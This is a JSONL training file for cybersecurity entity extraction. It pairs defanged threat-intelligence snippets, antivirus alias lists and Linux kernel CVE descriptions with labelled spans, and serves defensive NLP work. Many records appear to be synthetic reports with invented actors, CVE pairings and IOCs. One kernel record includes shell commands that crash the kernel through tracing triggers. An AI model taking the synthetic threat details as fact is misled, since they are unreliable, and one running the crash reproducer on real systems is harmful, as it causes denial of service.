{"text": "Vulnerability Advisory: CVE-2023-40294 is a critical type confusion affecting Cisco ASA. Recorded Future confirmed active exploitation by Aqua Blizzard in the wild. Exploitation delivers Vidar (MD5: 470ea820abeb27a8f99694b9064e5318) which is dropped to /dev/shm/update.dll. The exploit payload is hosted at hxxp://static-gateway[ . ]io/gate.php and communicates to 10 [ . ] 255 [ . ] 138 [ . ] 203 for C2.", "spans": {"Vulnerability: CVE-2023-40294": [[24, 38]], "Vulnerability: type confusion": [[53, 67]], "System: Cisco ASA": [[78, 87]], "Organization: Recorded Future": [[89, 104]], "Malware: Vidar": [[187, 192]], "Indicator: 470ea820abeb27a8f99694b9064e5318": [[199, 231]], "Indicator: hxxp://static-gateway.io/gate.php": [[307, 344]], "Indicator: 10.255.138.203": [[365, 397]]}, "info": {"id": "synth_v2_00740", "source": "defanged_augment"}}
{"text": "That domain, electronicfrontierfoundation[ . ]org, is designed to trick users into a false sense of trust and it appears to have been used in a spear phishing attack, though it is unclear who the intended targets were.", "spans": {"Indicator: electronicfrontierfoundation.org": [[13, 49]]}, "info": {"id": "cyner2_train_000301", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan.Win32.Antilam.gzgw Backdoor.Trojan Antilam.FE BKDR_ANTILAM.A Backdoor.Win32.Antilam.20.b Backdoor.Antilam!vJ4jD43D2/o NORMAL:Trojan.SERVER_3!27802 Backdoor.Win32.Antilam.dfer BackDoor.AntiLame.23 BKDR_ANTILAM.A BehavesLike[ . ]Win32[ . ]Backdoor[ . ]cc W32/Risk.BTKH-4955 Backdoor/Antilam.20.ao BDS/Antilam.20.C Trojan[Backdoor]/Win32.Antilam Backdoor:Win32/Antilam.20.B Trojan/Win32.Xema Backdoor.AntiLamer Win32/Antilam.20.B Backdoor.Win32.Antilam W32/Antilam.B!tr.bdr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Backdoor.cc": [[244, 285]]}, "info": {"id": "cyner2_train_001592", "source": "defanged_augment"}}
{"text": "The group's Cobalt Strike installation typically uses a payload named svchost[.]exe in an attempt to disguise Cobalt Strike activity as the legitimate Windows svchost[ . ]exe executable .", "spans": {"Indicator: svchost.exe": [[70, 83], [159, 174]], "System: Windows": [[151, 158]]}, "info": {"id": "cyberner_stix_train_004481", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 154 [ . ] 169 [ . ] 171 [ . ] 158, the Proofpoint IR team identified NjRAT running as /tmp/helper.sh. The threat actor, believed to be Sandworm, used PowerView for credential harvesting and PowerShell Empire for lateral movement. Exfiltrated data was sent to cdnproxy[.]xyz and data-data[.]online. The initial dropper (SHA1: edb04ccfb4ef20ac3fa5bbf206ab7c1f1528799a) was delivered via a phishing email from billing@identity-verify[.]cc. A second C2 node was observed at 108 [ . ] 168 [ . ] 83 [ . ] 27, with a persistence mechanism writing to /dev/shm/winlogon.exe.", "spans": {"Indicator: 154.169.171.158": [[64, 97]], "Organization: Proofpoint": [[103, 113]], "Malware: NjRAT": [[133, 138]], "Indicator: cdnproxy.xyz": [[323, 337]], "Indicator: data-data.online": [[342, 360]], "Indicator: edb04ccfb4ef20ac3fa5bbf206ab7c1f1528799a": [[389, 429]], "Indicator: billing@identity-verify.cc": [[471, 499]], "Indicator: 108.168.83.27": [[534, 565]]}, "info": {"id": "synth_v2_00301", "source": "defanged_augment"}}
{"text": "How do you know if your Google account is breached ? You can check if your account is compromised by accessing the following web site that we created : https : //gooligan[ . ]checkpoint[ . ]com/ .", "spans": {"Organization: Google": [[24, 30]], "Indicator: gooligan.checkpoint.com": [[162, 193]]}, "info": {"id": "cyner2_train_002531", "source": "defanged_augment"}}
{"text": "APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments , militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian Government . Symantec during 2012 linked the Elderwood Project to Operation Aurora ; Trojan.Naid and Backdoor[.]Moudoor were also used in Aurora , by the Elderwood Gang , and by Hidden Lynx .", "spans": {"Organization: governments": [[137, 148]], "Organization: militaries": [[151, 161]], "Organization: defense attaches": [[164, 180]], "Organization: media entities": [[183, 197]], "Organization: dissidents": [[204, 214]], "Organization: figures": [[219, 226]], "Organization: Symantec": [[271, 279]], "Malware: Trojan.Naid": [[343, 354]], "Indicator: Backdoor.Moudoor": [[359, 377]], "Malware: Aurora": [[396, 402]]}, "info": {"id": "cyberner_stix_train_003880", "source": "defanged_augment"}}
{"text": "Why Did Chinese Spyware Linger in U.S . After almost two weeks , on August 30 , 2018 , APT10 attackers used their access to the network to move laterally and made their first deployment of an RC4- and Salsa20-encrypted variant of the Trochilus malware using a previously associated DLL sideloading techniquE . The message asked the recipient to rename the attachment extension from “ [ . ]_X_ ” to “ .exe ” and opening it with the password specified in the email to view the Happy New Year eCard in the correct and polite language .", "spans": {"Indicator: ._X_": [[384, 392]]}, "info": {"id": "cyberner_stix_train_005540", "source": "defanged_augment"}}
{"text": "Blog Post by Zscaler ThreatLabz: Tracking Granite Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2021-24446 against VMware ESXi deployments. The initial access vector involves spear-phishing emails from finance@account-update[ . ]xyz delivering PikaBot. Post-compromise, the attackers deploy AgentTesla and use Rubeus for reconnaissance. C2 infrastructure includes 135[.]158[.]221[.]9 and portal-cloud[ . ]io. A staging server at hxxp://cache-portal[.]club/panel/index.html hosts additional tooling. Key artifact: C:\\Windows\\Temp\\agent.py (SHA1: 32ad0456a4bb79c0707c23630c427901e8e2bca7).", "spans": {"Organization: Zscaler ThreatLabz": [[13, 31]], "Vulnerability: CVE-2021-24446": [[137, 151]], "System: VMware ESXi": [[160, 171]], "Indicator: finance@account-update.xyz": [[247, 277]], "Malware: PikaBot": [[289, 296]], "Malware: AgentTesla": [[336, 346]], "Indicator: 135.158.221.9": [[409, 428]], "Indicator: portal-cloud.io": [[433, 452]], "Indicator: http://cache-portal.club/panel/index.html": [[474, 517]], "Indicator: 32ad0456a4bb79c0707c23630c427901e8e2bca7": [[590, 630]]}, "info": {"id": "synth_v2_01518", "source": "defanged_augment"}}
{"text": "We can observe below , the procedure through which the artifact attempts to establish a connection with the IP address 176 [ . ] 31 [ . ] 112 [ . ] 10 .", "spans": {"Indicator: 176.31.112.10": [[119, 150]]}, "info": {"id": "cyberner_stix_train_002734", "source": "defanged_augment"}}
{"text": "Cisco Talos detected a multi-stage attack chain. The initial phishing email from billing@secure-verify[ . ]net contained a link to hxxps://securemail[.]club/panel/index.html. This redirected to hxxp://securecache[.]xyz/login on edgelogin[.]live. A secondary email from contact@credential-check[ . ]site pointed to hxxp://securemail[.]live/assets/js/payload.js which delivered RedLine Stealer. The final payload callback was hxxps://portal-update[ . ]io/secure/token resolving to 218 [ . ] 10 [ . ] 32 [ . ] 22 via gateway-login[ . ]link.", "spans": {"Organization: Cisco Talos": [[0, 11]], "Indicator: billing@secure-verify.net": [[81, 110]], "Indicator: https://securemail.club/panel/index.html": [[131, 173]], "Indicator: http://securecache.xyz/login": [[194, 224]], "Indicator: edgelogin.live": [[228, 244]], "Indicator: contact@credential-check.site": [[269, 302]], "Indicator: http://securemail.live/assets/js/payload.js": [[314, 359]], "Malware: RedLine Stealer": [[376, 391]], "Indicator: hxxps://portal-update.io/secure/token": [[424, 465]], "Indicator: 218.10.32.22": [[479, 509]], "Indicator: gateway-login.link": [[514, 536]]}, "info": {"id": "synth_v2_01704", "source": "defanged_augment"}}
{"text": "Officials at BLU could n't be immediately reached for comment . Analysis of the Royal Road weaponizer has resulted in the discovery that multiple Chinese threat groups started utilizing CVE-2018-0798 in their RTF weaponizer . C2 : phot[.]healthsvsolu[.]com .", "spans": {"Organization: BLU": [[13, 16]], "Vulnerability: CVE-2018-0798": [[186, 199]], "Indicator: phot.healthsvsolu.com": [[231, 256]]}, "info": {"id": "cyberner_stix_train_006370", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed BloodHound artifacts at /var/tmp/config.dat. Memory dump analysis confirmed execution of Chisel. Registry modifications pointed to persistence via C:\\ProgramData\\config.dat. Network forensics identified connections to 192 [ . ] 102 [ . ] 223 [ . ] 60 and api-edge[.]dev. Email headers traced the initial vector to security@auth-check[ . ]org. File /home/user/.config/agent.py (SHA256: 0db4e25ab6261020a90b47f8866da6e56b157a6c42a5d30f250229de2874a693) was identified as the initial dropper. A staging URL hxxps://cachestorage[ . ]cc/assets/js/payload.js resolved to 165 [ . ] 11 [ . ] 128 [ . ] 24. Secondary artifact hash: SHA1: 9b44b0196a748264807df2046678bf9b3a23f7df.", "spans": {"Indicator: 192.102.223.60": [[290, 322]], "Indicator: api-edge.dev": [[327, 341]], "Indicator: security@auth-check.org": [[386, 413]], "Indicator: 0db4e25ab6261020a90b47f8866da6e56b157a6c42a5d30f250229de2874a693": [[457, 521]], "Indicator: hxxps://cachestorage.cc/assets/js/payload.js": [[576, 624]], "Indicator: 165.11.128.24": [[637, 668]], "Indicator: 9b44b0196a748264807df2046678bf9b3a23f7df": [[701, 741]]}, "info": {"id": "synth_v2_01296", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing/hist: Fix out-of-bound write on 'action_data.var_ref_idx'\n\nWhen generate a synthetic event with many params and then create a trace\naction for it [1], kernel panic happened [2].\n\nIt is because that in trace_action_create() 'data->n_params' is up to\nSYNTH_FIELDS_MAX (current value is 64), and array 'data->var_ref_idx'\nkeeps indices into array 'hist_data->var_refs' for each synthetic event\nparam, but the length of 'data->var_ref_idx' is TRACING_MAP_VARS_MAX\n(current value is 16), so out-of-bound write happened when 'data->n_params'\nmore than 16. In this case, 'data->match_data.event' is overwritten and\neventually cause the panic.\n\nTo solve the issue, adjust the length of 'data->var_ref_idx' to be\nSYNTH_FIELDS_MAX and add sanity checks to avoid out-of-bound write.\n\n[1]\n # cd /sys/kernel/tracing/\n # echo \"my_synth_event int v1; int v2; int v3; int v4; int v5; int v6;\\\nint v7; int v8; int v9; int v10; int v11; int v12; int v13; int v14;\\\nint v15; int v16; int v17; int v18; int v19; int v20; int v21; int v22;\\\nint v23; int v24; int v25; int v26; int v27; int v28; int v29; int v30;\\\nint v31; int v32; int v33; int v34; int v35; int v36; int v37; int v38;\\\nint v39; int v40; int v41; int v42; int v43; int v44; int v45; int v46;\\\nint v47; int v48; int v49; int v50; int v51; int v52; int v53; int v54;\\\nint v55; int v56; int v57; int v58; int v59; int v60; int v61; int v62;\\\nint v63\" >> synthetic_events\n # echo 'hist:keys=pid:ts0=common_timestamp.usecs if comm==\"bash\"' >> \\\nevents/sched/sched_waking/trigger\n # echo \"hist:keys=next_pid:onmatch(sched.sched_waking).my_synth_event(\\\npid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,\\\npid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,\\\npid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,pid,\\\npid,pid,pid,pid,pid,pid,pid,pid,pid)\" >> events/sched/sched_switch/trigger\n\n[2]\nBUG: unable to handle page fault for address: ffff91c900000000\nPGD 61001067 P4D 61001067 PUD 0\nOops: 0000 [#1] PREEMPT SMP NOPTI\nCPU: 2 PID: 322 Comm: bash Tainted: G        W          6.1.0-rc8+ #229\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\nrel-1[ . ]15[ . ]0-0-g2dd4b9b3f840-prebuilt[ . ]qemu[ . ]org 04/01/2014\nRIP: 0010:strcmp+0xc/0x30\nCode: 75 f7 31 d2 44 0f b6 04 16 44 88 04 11 48 83 c2 01 45 84 c0 75 ee\nc3 cc cc cc cc 0f 1f 00 31 c0 eb 08 48 83 c0 01 84 d2 74 13 <0f> b6 14\n07 3a 14 06 74 ef 19 c0 83 c8 01 c3 cc cc cc cc 31 c3\nRSP: 0018:ffff9b3b00f53c48 EFLAGS: 00000246\nRAX: 0000000000000000 RBX: ffffffffba958a68 RCX: 0000000000000000\nRDX: 0000000000000010 RSI: ffff91c943d33a90 RDI: ffff91c900000000\nRBP: ffff91c900000000 R08: 00000018d604b529 R09: 0000000000000000\nR10: ffff91c9483eddb1 R11: ffff91ca483eddab R12: ffff91c946171580\nR13: ffff91c9479f0538 R14: ffff91c9457c2848 R15: ffff91c9479f0538\nFS:  00007f1d1cfbe740(0000) GS:ffff91c9bdc80000(0000)\nknlGS:0000000000000000\nCS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: ffff91c900000000 CR3: 0000000006316000 CR4: 00000000000006e0\nCall Trace:\n <TASK>\n __find_event_file+0x55/0x90\n action_create+0x76c/0x1060\n event_hist_trigger_parse+0x146d/0x2060\n ? event_trigger_write+0x31/0xd0\n trigger_process_regex+0xbb/0x110\n event_trigger_write+0x6b/0xd0\n vfs_write+0xc8/0x3e0\n ? alloc_fd+0xc0/0x160\n ? preempt_count_add+0x4d/0xa0\n ? preempt_count_add+0x70/0xa0\n ksys_write+0x5f/0xe0\n do_syscall_64+0x3b/0x90\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\nRIP: 0033:0x7f1d1d0cf077\nCode: 64 89 02 48 c7 c0 ff ff ff ff eb bb 0f 1f 80 00 00 00 00 f3 0f 1e\nfa 64 8b 04 25 18 00 00 00 85 c0 75 10 b8 01 00 00 00 0f 05 <48> 3d 00\nf0 ff ff 77 51 c3 48 83 ec 28 48 89 54 24 18 48 89 74\nRSP: 002b:00007ffcebb0e568 EFLAGS: 00000246 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 0000000000000143 RCX: 00007f1d1d0cf077\nRDX: 0000000000000143 RSI: 00005639265aa7e0 RDI: 0000000000000001\nRBP: 00005639265aa7e0 R08: 000000000000000a R09: 0000000000000142\nR\n---truncated---", "spans": {"Indicator: rel-1.15.0-0-g2dd4b9b3f840-prebuilt.qemu.org": [[2233, 2293]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[2188, 2192]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-50553"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 172[.]246[.]158[.]145, the Symantec IR team identified Conti running as /opt/app/bin/chrome_helper.exe. The threat actor, believed to be MuddyWater, used Chisel for credential harvesting and Impacket for lateral movement. Exfiltrated data was sent to login-node[ . ]top and relayrelay[ . ]org. The initial dropper (SHA256: dca8da1f07404dcd18245ffee064ce6ac6fef092fb7a3aa59c5e06743240cfe4) was delivered via a phishing email from service@auth-check[.]org. A second C2 node was observed at 87 [ . ] 193 [ . ] 243 [ . ] 214, with a persistence mechanism writing to C:\\Program Files\\Common Files\\lsass.dmp.", "spans": {"Indicator: 172.246.158.145": [[64, 85]], "Organization: Symantec": [[91, 99]], "Malware: Conti": [[119, 124]], "Indicator: login-node.top": [[315, 333]], "Indicator: relayrelay.org": [[338, 356]], "Indicator: dca8da1f07404dcd18245ffee064ce6ac6fef092fb7a3aa59c5e06743240cfe4": [[387, 451]], "Indicator: service@auth-check.org": [[493, 517]], "Indicator: 87.193.243.214": [[552, 584]]}, "info": {"id": "synth_v2_00286", "source": "defanged_augment"}}
{"text": "The adware functionality is the same in all the apps we analyzed . Kaspersky also observed some activity from Gaza Team and MuddyWater . Here is the complete list of files internally used by the RAT: error[ . ]tmp (the log file of the keylogger) tedsul[ . ]ocx helpsol[ . ]ocx trepsl[ . ]ocx psltred[ . ]ocx solhelp[.]ocx sulted[.]ocx .", "spans": {"Organization: Kaspersky": [[67, 76]], "Indicator: error.tmp": [[200, 213]], "Indicator: tedsul.ocx": [[246, 260]], "Indicator: helpsol.ocx": [[261, 276]], "Indicator: trepsl.ocx": [[277, 291]], "Indicator: psltred.ocx": [[292, 307]], "Indicator: solhelp.ocx": [[308, 321]], "Indicator: sulted.ocx": [[322, 334]]}, "info": {"id": "cyberner_stix_train_001340", "source": "defanged_augment"}}
{"text": "However , a simple Google search for the adware package name returned a “ TestDelete ” project that had been available in his repository at some point The malicious developer also has apps in Apple ’ s App Store . The malware then writes the R resource data to the file C:\\WINDOWS\\tasksche.exe . Filename: conhote[.]dll .", "spans": {"Organization: Google": [[19, 25]], "Organization: Apple": [[192, 197]], "System: App Store": [[202, 211]], "Malware: malware": [[218, 225]], "Malware: file": [[265, 269]], "Malware: C:\\WINDOWS\\tasksche.exe": [[270, 293]], "Indicator: conhote.dll": [[306, 319]]}, "info": {"id": "cyberner_stix_train_001136", "source": "defanged_augment"}}
{"text": "] 144 [ . APT37 has likely been active since at least 2012 and focuses on targeting the public and private sectors primarily in South Korea . In the case of old Windows versions like XP , main module events[.]exe runs an edited XPTask[ . ]vbs Microsoft sample script to create a weekly scheduled task for . The duration of manipulation may be temporary or longer sustained , depending on operator detection .", "spans": {"System: Windows": [[161, 168]], "System: XP": [[183, 185]], "Indicator: events.exe": [[200, 212]], "Indicator: XPTask.vbs": [[228, 242]], "Organization: Microsoft": [[243, 252]]}, "info": {"id": "cyberner_stix_train_001234", "source": "defanged_augment"}}
{"text": "A backdoor also known as: W32.AppdataAdobLnrC.Trojan Net-Worm.Win32.Cynic!O Worm.Cynic Worm.Cynic.Win32.96 Win32.Trojan.WisdomEyes.16070401.9500.9997 Net-Worm.Win32.Cynic.iu Trojan.Win32.Bot.crrkzb BackDoor.IRC.Bot.1244 BehavesLike.Win32.Downloader.ct TR/Zbot.var Worm[Net]/Win32.Cynic Worm:Win32/Vexral.A Trojan.Barys.657 Worm[.]Win32[.]A[.]Net-Cynic.95744 Net-Worm.Win32.Cynic.iu Trojan/Win32.IRCBot.R23264 Worm.Cynic Win32/AutoRun.IRCBot.II Trojan.Injector!y7pxtOpaO3Y Net-Worm.Win32.Cynic W32/Injector.HXK!tr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Worm.Win32.A.Net": [[323, 345]]}, "info": {"id": "cyner2_train_004368", "source": "defanged_augment"}}
{"text": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0 [ . ] 9 [ . ] 8 [ . ] 923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_dashboard.php. When parsing the service_start parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9719.", "spans": {"Indicator: 0.9.8.923": [[123, 150]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-15435"}}
{"text": "Malware Analysis Report: Hive (MD5: b73d1d39467e447cdea82a221faee369). Upon execution on Ubuntu 22.04, the sample creates /var/tmp/sam.hive and injects into legitimate processes. Network analysis shows beaconing to 172 [ . ] 77 [ . ] 218 [ . ] 141 every 60 seconds and DNS queries to cloudupdate[.]net. The second stage was fetched from hxxp://cdn-sync[.]club/api/v2/auth and written to C:\\Users\\admin\\Downloads\\beacon.dll. The payload uses Metasploit-style techniques for defense evasion. A secondary hash (SHA1: 76aa029a5d5258ca206d2e10dbd108961db3dadb) was extracted from the unpacked payload.", "spans": {"Malware: Hive": [[25, 29]], "Indicator: b73d1d39467e447cdea82a221faee369": [[36, 68]], "System: Ubuntu 22.04": [[89, 101]], "Indicator: 172.77.218.141": [[215, 247]], "Indicator: cloudupdate.net": [[284, 301]], "Indicator: http://cdn-sync.club/api/v2/auth": [[337, 371]], "Indicator: 76aa029a5d5258ca206d2e10dbd108961db3dadb": [[514, 554]]}, "info": {"id": "synth_v2_00606", "source": "defanged_augment"}}
{"text": "ESET detects this adware , collectively , as Android/AdDisplay.Ashas . In January , Kaspersky identified new activity by the Transparent Tribe APT group aka PROJECTM and MYTHIC LEOPARD , a threat actor with interests aligned with Pakistan that has shown a persistent focus on Indian military targets . The malware configuration contains one Command and Control: pactchfilepacks[.]net23[.]net .", "spans": {"Organization: ESET": [[0, 4]], "Malware: Android/AdDisplay.Ashas": [[45, 68]], "Organization: Kaspersky": [[84, 93]], "Organization: military": [[283, 291]], "Indicator: pactchfilepacks.net23.net": [[362, 391]]}, "info": {"id": "cyberner_stix_train_005679", "source": "defanged_augment"}}
{"text": "Vulnerability in the Enterprise Manager for Oracle Database product of Oracle Enterprise Manager (component: Target Management). Supported versions that are affected are 12 [ . ] 1 [ . ] 0 [ . ] 5, 13[.]2[.]0[.]0 and 13[.]3[.]0[.]0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Enterprise Manager for Oracle Database. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Enterprise Manager for Oracle Database accessible data as well as unauthorized update, insert or delete access to some of Enterprise Manager for Oracle Database accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Enterprise Manager for Oracle Database. CVSS 3.0 Base Score 6.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L).", "spans": {"Indicator: 12.1.0.5": [[170, 196]], "Indicator: 13.2.0.0": [[198, 212]], "Indicator: 13.3.0.0": [[217, 231]], "System: Oracle Database": [[44, 59], [364, 379], [522, 537], [644, 659], [778, 793]], "Organization: Oracle": [[71, 77]], "Vulnerability: denial of service": [[720, 737]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-2640"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: Fix infinite recursion in fib6_dump_done().\n\nsyzkaller reported infinite recursive calls of fib6_dump_done() during\nnetlink socket destruction.  [1]\n\nFrom the log, syzkaller sent an AF_UNSPEC RTM_GETROUTE message, and then\nthe response was generated.  The following recvmmsg() resumed the dump\nfor IPv6, but the first call of inet6_dump_fib() failed at kzalloc() due\nto the fault injection.  [0]\n\n  12:01:34 executing program 3:\n  r0 = socket$nl_route(0x10, 0x3, 0x0)\n  sendmsg$nl_route(r0, ... snip ...)\n  recvmmsg(r0, ... snip ...) (fail_nth: 8)\n\nHere, fib6_dump_done() was set to nlk_sk(sk)->cb.done, and the next call\nof inet6_dump_fib() set it to nlk_sk(sk)->cb.args[3].  syzkaller stopped\nreceiving the response halfway through, and finally netlink_sock_destruct()\ncalled nlk_sk(sk)->cb.done().\n\nfib6_dump_done() calls fib6_dump_end() and nlk_sk(sk)->cb.done() if it\nis still not NULL.  fib6_dump_end() rewrites nlk_sk(sk)->cb.done() by\nnlk_sk(sk)->cb.args[3], but it has the same function, not NULL, calling\nitself recursively and hitting the stack guard page.\n\nTo avoid the issue, let's set the destructor after kzalloc().\n\n[0]:\nFAULT_INJECTION: forcing a failure.\nname failslab, interval 1, probability 0, space 0, times 0\nCPU: 1 PID: 432110 Comm: syz-executor.3 Not tainted 6.8.0-12821-g537c2e91d354-dirty #11\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1[ . ]16[ . ]0-0-gd239552ce722-prebuilt[ . ]qemu[ . ]org 04/01/2014\nCall Trace:\n <TASK>\n dump_stack_lvl (lib/dump_stack.c:117)\n should_fail_ex (lib/fault-inject.c:52 lib/fault-inject.c:153)\n should_failslab (mm/slub.c:3733)\n kmalloc_trace (mm/slub.c:3748 mm/slub.c:3827 mm/slub.c:3992)\n inet6_dump_fib (./include/linux/slab.h:628 ./include/linux/slab.h:749 net/ipv6/ip6_fib.c:662)\n rtnl_dump_all (net/core/rtnetlink.c:4029)\n netlink_dump (net/netlink/af_netlink.c:2269)\n netlink_recvmsg (net/netlink/af_netlink.c:1988)\n ____sys_recvmsg (net/socket.c:1046 net/socket.c:2801)\n ___sys_recvmsg (net/socket.c:2846)\n do_recvmmsg (net/socket.c:2943)\n __x64_sys_recvmmsg (net/socket.c:3041 net/socket.c:3034 net/socket.c:3034)\n\n[1]:\nBUG: TASK stack guard page was hit at 00000000f2fa9af1 (stack is 00000000b7912430..000000009a436beb)\nstack guard page: 0000 [#1] PREEMPT SMP KASAN\nCPU: 1 PID: 223719 Comm: kworker/1:3 Not tainted 6.8.0-12821-g537c2e91d354-dirty #11\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1[ . ]16[ . ]0-0-gd239552ce722-prebuilt[ . ]qemu[ . ]org 04/01/2014\nWorkqueue: events netlink_sock_destruct_work\nRIP: 0010:fib6_dump_done (net/ipv6/ip6_fib.c:570)\nCode: 3c 24 e8 f3 e9 51 fd e9 28 fd ff ff 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 f3 0f 1e fa 41 57 41 56 41 55 41 54 55 48 89 fd <53> 48 8d 5d 60 e8 b6 4d 07 fd 48 89 da 48 b8 00 00 00 00 00 fc ff\nRSP: 0018:ffffc9000d980000 EFLAGS: 00010293\nRAX: 0000000000000000 RBX: ffffffff84405990 RCX: ffffffff844059d3\nRDX: ffff8881028e0000 RSI: ffffffff84405ac2 RDI: ffff88810c02f358\nRBP: ffff88810c02f358 R08: 0000000000000007 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000224 R12: 0000000000000000\nR13: ffff888007c82c78 R14: ffff888007c82c68 R15: ffff888007c82c68\nFS:  0000000000000000(0000) GS:ffff88811b100000(0000) knlGS:0000000000000000\nCS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: ffffc9000d97fff8 CR3: 0000000102309002 CR4: 0000000000770ef0\nPKRU: 55555554\nCall Trace:\n <#DF>\n </#DF>\n <TASK>\n fib6_dump_done (net/ipv6/ip6_fib.c:572 (discriminator 1))\n fib6_dump_done (net/ipv6/ip6_fib.c:572 (discriminator 1))\n ...\n fib6_dump_done (net/ipv6/ip6_fib.c:572 (discriminator 1))\n fib6_dump_done (net/ipv6/ip6_fib.c:572 (discriminator 1))\n netlink_sock_destruct (net/netlink/af_netlink.c:401)\n __sk_destruct (net/core/sock.c:2177 (discriminator 2))\n sk_destruct (net/core/sock.c:2224)\n __sk_free (net/core/sock.c:2235)\n sk_free (net/core/sock.c:2246)\n process_one_work (kernel/workqueue.c:3259)\n worker_thread (kernel/workqueue.c:3329 kernel/workqueue.\n---truncated---", "spans": {"Indicator: rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org": [[1455, 1515], [2476, 2536]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[1410, 1414], [2431, 2435]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-35886"}}
{"text": "We identified an overlap in the domain voguextra[.]com , which was used by Bahamut within their \" Devoted To Humanity \" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post .", "spans": {"Malware: Devoted To Humanity": [[98, 117]], "Indicator: voguextra.com": [[39, 54]]}, "info": {"id": "dnrti_train_001710", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2024-30673 is a critical CSRF vulnerability affecting Atlassian Confluence. Palo Alto Unit 42 confirmed active exploitation by Turla in the wild. Exploitation delivers IcedID (SHA1: a54849f46f2a2cd2cbeaa8926bd479a1d316da5f) which is dropped to C:\\Users\\Public\\Documents\\dropper.ps1. The exploit payload is hosted at hxxp://login-proxy[ . ]info/collect and communicates to 125 [ . ] 233 [ . ] 148 [ . ] 181 for C2.", "spans": {"Vulnerability: CVE-2024-30673": [[24, 38]], "Vulnerability: CSRF vulnerability": [[53, 71]], "System: Atlassian Confluence": [[82, 102]], "Organization: Palo Alto Unit 42": [[104, 121]], "Malware: IcedID": [[196, 202]], "Indicator: a54849f46f2a2cd2cbeaa8926bd479a1d316da5f": [[210, 250]], "Indicator: http://login-proxy.info/collect": [[344, 379]], "Indicator: 125.233.148.181": [[400, 433]]}, "info": {"id": "synth_v2_00778", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: Fix wild-memory-access in register_synth_event()\n\nIn register_synth_event(), if set_synth_event_print_fmt() failed, then\nboth trace_remove_event_call() and unregister_trace_event() will be\ncalled, which means the trace_event_call will call\n__unregister_trace_event() twice. As the result, the second unregister\nwill causes the wild-memory-access.\n\nregister_synth_event\n    set_synth_event_print_fmt failed\n    trace_remove_event_call\n        event_remove\n            if call->event.funcs then\n            __unregister_trace_event (first call)\n    unregister_trace_event\n        __unregister_trace_event (second call)\n\nFix the bug by avoiding to call the second __unregister_trace_event() by\nchecking if the first one is called.\n\ngeneral protection fault, probably for non-canonical address\n\t0xfbd59c0000000024: 0000 [#1] SMP KASAN PTI\nKASAN: maybe wild-memory-access in range\n[0xdead000000000120-0xdead000000000127]\nCPU: 0 PID: 3807 Comm: modprobe Not tainted\n6.1.0-rc1-00186-g76f33a7eedb4 #299\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\nrel-1[ . ]15[ . ]0-0-g2dd4b9b3f840-prebuilt[ . ]qemu[ . ]org 04/01/2014\nRIP: 0010:unregister_trace_event+0x6e/0x280\nCode: 00 fc ff df 4c 89 ea 48 c1 ea 03 80 3c 02 00 0f 85 0e 02 00 00 48\nb8 00 00 00 00 00 fc ff df 4c 8b 63 08 4c 89 e2 48 c1 ea 03 <80> 3c 02\n00 0f 85 e2 01 00 00 49 89 2c 24 48 85 ed 74 28 e8 7a 9b\nRSP: 0018:ffff88810413f370 EFLAGS: 00010a06\nRAX: dffffc0000000000 RBX: ffff888105d050b0 RCX: 0000000000000000\nRDX: 1bd5a00000000024 RSI: ffff888119e276e0 RDI: ffffffff835a8b20\nRBP: dead000000000100 R08: 0000000000000000 R09: fffffbfff0913481\nR10: ffffffff8489a407 R11: fffffbfff0913480 R12: dead000000000122\nR13: ffff888105d050b8 R14: 0000000000000000 R15: ffff888105d05028\nFS:  00007f7823e8d540(0000) GS:ffff888119e00000(0000)\nknlGS:0000000000000000\nCS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f7823e7ebec CR3: 000000010a058002 CR4: 0000000000330ef0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 